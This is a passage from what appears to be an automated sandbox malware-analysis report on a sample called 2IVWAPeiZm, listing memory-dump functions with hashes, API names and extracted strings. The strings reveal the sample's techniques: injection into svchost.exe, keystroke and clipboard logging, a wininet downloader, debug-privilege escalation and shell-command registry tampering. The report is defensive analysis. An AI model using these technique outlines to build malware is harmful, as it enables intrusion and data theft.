                          • Opcode Fuzzy Hash: 94c7016ab2636b5593df99f46c9914e648a045f6aa69c007a8dbfde07d768e9c
                          • Instruction Fuzzy Hash: D041F630658A884BEB4C9E5CD44277573E6FBC9305F28826EE84AC724ADB30DD53CB81
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: Virtual$AllocFree
                          • String ID:
                          • API String ID: 2087232378-0
                          • Opcode ID: 55e2e7680265c973ffa1402e91b46b56024d44e698dc05e421f391570d180b39
                          • Instruction ID: 70c5c53efbc893b8d49f2abac35e41e0b1b95536ba011f99470416a051eb731c
                          • Opcode Fuzzy Hash: 55e2e7680265c973ffa1402e91b46b56024d44e698dc05e421f391570d180b39
                          • Instruction Fuzzy Hash: 3E217130618A494FEB84EF6DD444765B3F1FB98305F58866EE44AD3244D734DDC28B81
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtual$AllocFree
                          • String ID:
                          • API String ID: 2087232378-0
                          • Opcode ID: 8303c3e4668dae72bfe50a81cfd7d80abcd5397e62f95a8cd0872008db4cf539
                          • Instruction ID: c6fe33e61a90b1336228a6e023063dabb7ff9e7188378c74ed4e9ecaff684196
                          • Opcode Fuzzy Hash: 8303c3e4668dae72bfe50a81cfd7d80abcd5397e62f95a8cd0872008db4cf539
                          • Instruction Fuzzy Hash: A8218332714A8187E748DB2AE580B59B3B3F749B80F548539EA5993748DF34DDE38B40
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtual$AllocFree
                          • String ID:
                          • API String ID: 2087232378-0
                          • Opcode ID: 589145581fe8846709afbff4a435c03ae035fa6c44f0b84fefac36e8fb5e0a43
                          • Instruction ID: 86042e8100e1eedfeab8f6b85577f5162412265ebc5a22697d7d922842995e1f
                          • Opcode Fuzzy Hash: 589145581fe8846709afbff4a435c03ae035fa6c44f0b84fefac36e8fb5e0a43
                          • Instruction Fuzzy Hash: 83118131714A8586E758DB26E580B59B3B7E794BC4F14C129DA4A83758EF38CA92CB40
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4113640461.00007FF6F6081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6F6080000, based on PE: true
                          • Associated: 00000000.00000002.4113613717.00007FF6F6080000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.4113640461.00007FF6F6089000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.4113640461.00007FF6F6362000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.4113640461.00007FF6F636B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.4113640461.00007FF6F679E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff6f6080000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: Concurrency::cancel_current_task
                          • String ID:
                          • API String ID: 118556049-0
                          • Opcode ID: edba40cea0880d194ebaa201299cea23ff4f6bb981d96338f85a74e8e429ba8b
                          • Instruction ID: 406317de8859bf8aa0a375d4802514331fc3c0db9d7a5c88e96fab3b67910fb8
                          • Opcode Fuzzy Hash: edba40cea0880d194ebaa201299cea23ff4f6bb981d96338f85a74e8e429ba8b
                          • Instruction Fuzzy Hash: D9319372619B8681EB28DAB5D20427DA359BB84BE0F684635CBBD877E5EE7DD041C300
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: send
                          • String ID:
                          • API String ID: 2809346765-0
                          • Opcode ID: 993fe9fb8bd5cda1ffd7d49de116850fd78509aad300088003f3a940471f662b
                          • Instruction ID: a7ebbacc9f6db5956069daf4d990a87c24feab5731e023f3e26cf590659b3ac6
                          • Opcode Fuzzy Hash: 993fe9fb8bd5cda1ffd7d49de116850fd78509aad300088003f3a940471f662b
                          • Instruction Fuzzy Hash: E721D67054CA880FE768AA28D8467B933E5EB85314F28113DE99FC3192E770DD534686
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: Sleep
                          • String ID:
                          • API String ID: 3472027048-0
                          • Opcode ID: 88df6c9814dd7951e769eaa4fec861968935f3fc4ebb5d812e480bd371ef65fc
                          • Instruction ID: 4046ced1bdc44884a1783ac72c7e28a850fba9a1fb220f1c07a4a4b1c361e8d3
                          • Opcode Fuzzy Hash: 88df6c9814dd7951e769eaa4fec861968935f3fc4ebb5d812e480bd371ef65fc
                          • Instruction Fuzzy Hash: B00180706186458FF7989B28D088BA8B7E2FF88305F5C066DE05AC21D1CB74DD86C742
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: Sleep
                          • String ID:
                          • API String ID: 3472027048-0
                          • Opcode ID: bc31317e1241cbe88b87a2fddbfd8f69b2015d3f2dce8f37f5b894eda6bc4ee3
                          • Instruction ID: 10b42ba17488e3b414c7864365416a4ecbdd30ee14c620697ce26bd59c9482f1
                          • Opcode Fuzzy Hash: bc31317e1241cbe88b87a2fddbfd8f69b2015d3f2dce8f37f5b894eda6bc4ee3
                          • Instruction Fuzzy Hash: DFF03A302109048FEB48EF79D8986A037A1FB9D322F548365A97ACA2F5CB754881CB55
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: CreateHeap
                          • String ID:
                          • API String ID: 10892065-0
                          • Opcode ID: 548033a4c8ebb5abcb3e3bdf629b7b62b8a0c9b1179596de6b3cb96c9a1ceea0
                          • Instruction ID: 046c8ed7c50a47ea4ff79a0b177faaf496b88432cad583347e7f3cbbe5648b82
                          • Opcode Fuzzy Hash: 548033a4c8ebb5abcb3e3bdf629b7b62b8a0c9b1179596de6b3cb96c9a1ceea0
                          • Instruction Fuzzy Hash: 68F065302149844BF788AB28EC5D796B7E5FB88301F848439A94BC2190DF7CC5828745
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4113640461.00007FF6F6081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6F6080000, based on PE: true
                          • Associated: 00000000.00000002.4113613717.00007FF6F6080000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.4113640461.00007FF6F6089000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.4113640461.00007FF6F6362000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.4113640461.00007FF6F636B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.4113640461.00007FF6F679E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff6f6080000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: Concurrency::cancel_current_task
                          • String ID:
                          • API String ID: 118556049-0
                          • Opcode ID: d025a0e1d41393ba07662206550253d192c19e5506cd72aa5c0ac771977cc478
                          • Instruction ID: eb8ee943d22e061f1d3bf1554c1c4d78764553fdb5acf73dc59d3013769754b3
                          • Opcode Fuzzy Hash: d025a0e1d41393ba07662206550253d192c19e5506cd72aa5c0ac771977cc478
                          • Instruction Fuzzy Hash: 05E0EC50E4D10701FF5CA6B226160B5014C8FA8770E3C2B30DABD842E7BE1EA4578211
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: ExitThreadUser_getptd
                          • String ID:
                          • API String ID: 4236301427-0
                          • Opcode ID: 6728eb8ad14789e92f053a9f08787bb6a57bfc41c8639fd74269a17bdb9f7047
                          • Instruction ID: a94892f993fe48435e3ca417aa72f8abfdd1a8da4a2fcde3edb60c33438706d0
                          • Opcode Fuzzy Hash: 6728eb8ad14789e92f053a9f08787bb6a57bfc41c8639fd74269a17bdb9f7047
                          • Instruction Fuzzy Hash: 1DD0C930AC25444BEE48B374C46AFE833A69F85300F9E10B8A40AC3293DE5E8D568201
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitThread_amsg_exit_getptd
                          • String ID:
                          • API String ID: 449628364-0
                          • Opcode ID: 89516202c857e40fa39cb306dfbb3384337f535eef88643803fa67fb2fa8daaf
                          • Instruction ID: 9ee064bfd5edd72a387d6a4d227816b1243b13d64d2dd430af621ed601a2e1b8
                          • Opcode Fuzzy Hash: 89516202c857e40fa39cb306dfbb3384337f535eef88643803fa67fb2fa8daaf
                          • Instruction Fuzzy Hash: 47C01225F8219141FA047771C456BEC0173D7D6704F41A878911983383CE18CA575204
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: b683d88442267f3b298fb07b97a96996fc05f56e0573c8ee7c1cfc654371a48f
                          • Instruction ID: 0a74d5b798dcd2ec460037c16781f4b4271bdb92d0ff039a08bb239caa64735f
                          • Opcode Fuzzy Hash: b683d88442267f3b298fb07b97a96996fc05f56e0573c8ee7c1cfc654371a48f
                          • Instruction Fuzzy Hash: F0814E30618E459FE788EB38C445BA5B7E2FF94300F68822DE45EC3255DB34E996CB81
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$AddressLibraryLoadProc$AllocCreateCurrentDirectoryFileMemoryModuleNameOpenSystemVirtualWrite
                          • String ID: %s%s$@$ExitProcess$Kernel32.dll$OpenProcess$WaitForSingleObject$WinExec$Windows\System32\svchost.exe$h
                          • API String ID: 675209239-4110464286
                          • Opcode ID: a97d71568bbf18846906c7cfef66eb8c9853d60e9d6f82541070b3eacffee3a6
                          • Instruction ID: 85a423d3aaceaa8422246715a44bb840864974586e7bbc4fccb6f9f967d75bdb
                          • Opcode Fuzzy Hash: a97d71568bbf18846906c7cfef66eb8c9853d60e9d6f82541070b3eacffee3a6
                          • Instruction Fuzzy Hash: A2A11A31254BC685FB20DB25E854BD973B7FB99B88F804029DA890BB59DF79CB46C700
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlenwsprintf$ClipboardGlobal$CountTick$CloseDataLockOpenSizeSleepStateUnlock
                          • String ID: [$%s%s$%s%s$%s%s$)$)$5$5$9$[esc]$f
                          • API String ID: 4137050888-2084089848
                          • Opcode ID: be78bd541a2a61736a1957c595b8d8e79a2c05db90525e976eabeae237735a03
                          • Instruction ID: 7dd3f5515ca23fcaffca9b243d6a14844b4602d13a1a165880693969f67d325f
                          • Opcode Fuzzy Hash: be78bd541a2a61736a1957c595b8d8e79a2c05db90525e976eabeae237735a03
                          • Instruction Fuzzy Hash: 71A16931284AD286FB509F25E844BE933B7F745B84F45A03ED94A966A9DB38CF47C700
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: __doserrno_errno_invalid_parameter_noinfo
                          • String ID: U
                          • API String ID: 3902385426-4171548499
                          • Opcode ID: 14832583135990958cc041f7d1495fdaf62a60cf093e4a4757440e2763ab6bc2
                          • Instruction ID: 24ad976c5e646cb39c4f51d7a9f8330210c653ab481a03cc82e9a13acb53be81
                          • Opcode Fuzzy Hash: 14832583135990958cc041f7d1495fdaf62a60cf093e4a4757440e2763ab6bc2
                          • Instruction Fuzzy Hash: 9812E1322446E686FB609F35D044BEA67B3F784B84F54613EDA49477A8DB39CE46CB00
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: write_multi_char$_errno_invalid_parameter_noinfowrite_char$_fileno_getptdfree
                          • String ID: $@
                          • API String ID: 1084558760-1077428164
                          • Opcode ID: b93bcdadbb8f90328ffe307164794086ab09e7f1a399fbb678084070f32f958e
                          • Instruction ID: 73fa0917c5afee175fb32811dab56f8eba0fdd467c0bc25091bf066aef31f69d
                          • Opcode Fuzzy Hash: b93bcdadbb8f90328ffe307164794086ab09e7f1a399fbb678084070f32f958e
                          • Instruction Fuzzy Hash: 445215325886E28AFB658B55D544BEE6BB3F785788F24203DDA45476E4CB38CE43CB40
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: write_multi_char$_errno_invalid_parameter_noinfowrite_char$_fileno_getptdfree
                          • String ID: $@
                          • API String ID: 1084558760-1077428164
                          • Opcode ID: 0dd8a9e9680b45a2330683c2a2ed1dce40d136c4451b1250229d276cd2c77d16
                          • Instruction ID: ec0a05dae091c906adf1a0cdae9a76cc3ba7956eb840e790f17444c3cdd06b3b
                          • Opcode Fuzzy Hash: 0dd8a9e9680b45a2330683c2a2ed1dce40d136c4451b1250229d276cd2c77d16
                          • Instruction Fuzzy Hash: D552F2726986F286FB658B15D544BEEABB3F741788F14203EDA46476E4D738CE42C700
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$Library$FileFree$CloseCreateHandleLoadSleepWrite
                          • String ID: InternetCloseHandle$InternetOpenUrlW$InternetOpenW$InternetReadFile$MSIE 6.0$wininet.dll
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateFile$Mutex$CloseCountDeleteDirectFolderHandleInput8ObjectPathReleaseSingleSizeStateTickWaitlstrcat
                          • String ID: <$\DisplaySessionContainers.log
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcatlstrlen$CreateEnvironmentExpandProcessStringslstrcpywsprintf
                          • String ID: $"%1$%s\shell\open\command$WinSta0\Default$h
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: __doserrno_errno_invalid_parameter_noinfo
                          • String ID: U
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: __doserrno_errno_invalid_parameter_noinfo
                          • String ID: U
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: DecodePointerwrite_multi_char$_errno_invalid_parameter_noinfo$_getptdfreewrite_char
                          • String ID:
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close$OpenQueryValuelstrcpy
                          • String ID: %08X
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Thread$ContextProcess$AllocCreateDirectoryMemoryResumeSystemVirtualWrite
                          • String ID: %s%s$@$Windows\System32\svchost.exe$h
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$HandleOpenToken$AddressAdjustCloseCurrentLookupModulePrivilegePrivilegesProcValue
                          • String ID: NtDll.dll$NtSetInformationProcess$SeDebugPrivilege
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateEvent$CountCriticalInitializeSectionSpinTimetime
                          • String ID: <$<
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: File_set_error_mode$HandleModuleNameWrite
                          • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program: $ceil
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: DecodePointerwrite_multi_char$_errno$_getptd_invalid_parameter_noinfofreewrite_char
                          • String ID:
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _get_daylight$_errno_isindst$__getgmtimebuf__tzset_invalid_parameter_noinfo
                          • String ID:
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _get_daylight$_errno_isindst$__getgmtimebuf__tzset_invalid_parameter_noinfo
                          • String ID:
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandleProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                          • String ID: SeShutdownPrivilege
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$_invalid_parameter_noinfo$_cftoe_l_getptd
                          • String ID: gfffffff
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                          • String ID: ceil
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
                          • String ID:
                          APIs
                          Memory Dump Source
